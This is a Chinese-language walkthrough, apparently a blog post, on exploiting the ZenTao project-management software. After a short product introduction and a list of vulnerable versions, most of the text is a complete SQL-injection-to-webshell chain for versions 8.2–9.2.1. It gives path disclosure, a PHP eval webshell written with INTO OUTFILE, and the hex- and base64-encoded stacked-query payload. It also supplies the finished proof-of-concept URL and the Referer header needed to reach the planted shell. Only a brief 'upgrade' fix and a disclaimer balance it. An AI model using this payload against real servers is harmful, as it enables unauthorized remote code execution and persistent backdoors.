一、禅道简介
禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。 厂商官网:https://www.zentao.net
二、获取版本
使用/index.php?mode=getconfig
获取版本号
注意 有的版本和部署方式可能需要加 zentao eg:ip/zentao/index.php?mode=getconfig
各个版本漏洞
1. 版本<= 12.4.2 存在任意文件上传漏洞(需要要登录) 任意文件上传
2. 禅道 11.6、禅道开源版 9 任意代码执行(需要登录)
3. 11.6 sql注入(需要登录) sql注入
4. 8.2-9.2.1 sql注入getShell
三、漏洞复现
本例只复现 8.2-9.2 需要登录情况下 暂不复现
8.2-9.2.1 sql注入getShell
1.获取物理路径 随意拼接路径报错会爆出物理路径 eg: ip/zentao//gaeag
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-760CTOS1-1623080144285)(http://doc.hijishu.cn/server/index.php?s=/api/attachment/visitFile/sign/359e1e068a01cb2bde239bd7eb966813)]
2.使用select 导出shell
使用ASCII hex 编码
select'<?php @eval($_POST[1])?>' into outfile'D:/sys/xampp/zentao/www/xx.php'
路径需要根据物理路径进行改变。
ASCII hex 后得到:
73656c656374273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c6527443a2f7379732f78616d70702f7a656e74616f2f7777772f78782e706870
3.将得到的串放入如下语句 后进行base64
{"orderBy":"order limit 1;SET @SQL=0x73656c656374273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c6527443a2f7379732f78616d70702f7a656e74616f2f7777772f78782e706870;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}
base64 eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDI3M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUwNGY1MzU0NWIzMTVkMjkzZjNlMjcyMDY5NmU3NDZmMjA2Zjc1NzQ2NjY5NmM2NTI3NDQzYTJmNzM3OTczMmY3ODYxNmQ3MDcwMmY3YTY1NmU3NDYxNmYyZjc3Nzc3NzJmNzg3ODJlNzA2ODcwO1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9
4.构造poc
http://ip/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&
param=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDI3M2MzZjcwNjg3MDIwNDA2NTc2NjE2YzI4MjQ1ZjUwNGY1MzU0NWIzMTVkMjkzZjNlMjcyMDY5NmU3NDZmMjA2Zjc1NzQ2NjY5NmM2NTI3NDQzYTJmNzM3OTczMmY3ODYxNmQ3MDcwMmY3YTY1NmU3NDYxNmYyZjc3Nzc3NzJmNzg3ODJlNzA2ODcwO1BSRVBBUkUgcG9yZCBGUk9NIEBTUUw7RVhFQ1VURSBwb3JkOy0tIC0iLCJudW0iOiIxLDEiLCJ0eXBlIjoib3BlbmVkYnltZSJ9
注意: 必须添加referer: http://ip/zentao
进行连接 http://ip/zentao/xx.php 即可
修复建议
升至最新版
注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关!